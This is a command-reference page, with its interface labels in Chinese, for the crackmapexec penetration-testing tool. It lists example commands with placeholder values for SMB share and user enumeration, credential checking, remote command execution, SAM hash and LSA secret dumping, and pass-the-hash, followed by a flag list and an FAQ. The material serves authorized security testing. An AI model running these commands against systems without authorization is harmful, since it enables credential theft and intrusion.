Linux command
crackmapexec 命令
文本
复制后可按需替换文件名、目录或参数。
常用示例
Enumerate SMB shares
crackmapexec smb [192.168.1.0/24] -u [user] -p [password] --shares
Check credentials
crackmapexec smb [hosts.txt] -u [user] -p [password]
Execute command
crackmapexec smb [target] -u [user] -p [password] -x "[whoami]"
Dump SAM hashes
crackmapexec smb [target] -u [admin] -p [password] --sam
Pass the hash
crackmapexec smb [target] -u [user] -H [ntlm_hash]
Enumerate users
crackmapexec smb [target] -u [user] -p [password] --users
说明
crackmapexec (CME) is a post-exploitation tool for penetration testing Windows/Active Directory environments. It automates common tasks like credential validation, share enumeration, and command execution across multiple hosts. The tool supports SMB, WinRM, LDAP, MSSQL, and SSH protocols. It's designed for authorized security assessments and red team operations.
参数
- -u _user_
- Username for authentication.
- -p _password_
- Password for authentication.
- -H _hash_
- NTLM hash for pass-the-hash.
- -d _domain_
- Domain name.
- -x _command_
- Execute command.
- -X _command_
- Execute PowerShell command.
- --shares
- Enumerate SMB shares.
- --users
- Enumerate domain users.
- --sam
- Dump SAM database.
- --lsa
- Dump LSA secrets.
- --local-auth
- Use local authentication.
- -M _module_
- Run specific module.
FAQ
What is the crackmapexec command used for?
crackmapexec (CME) is a post-exploitation tool for penetration testing Windows/Active Directory environments. It automates common tasks like credential validation, share enumeration, and command execution across multiple hosts. The tool supports SMB, WinRM, LDAP, MSSQL, and SSH protocols. It's designed for authorized security assessments and red team operations.
How do I run a basic crackmapexec example?
Run `crackmapexec smb [192.168.1.0/24] -u [user] -p [password] --shares` in a terminal, then adjust file names, paths, flags, or remote targets for your system.
What does -u _user_ do in crackmapexec?
Username for authentication.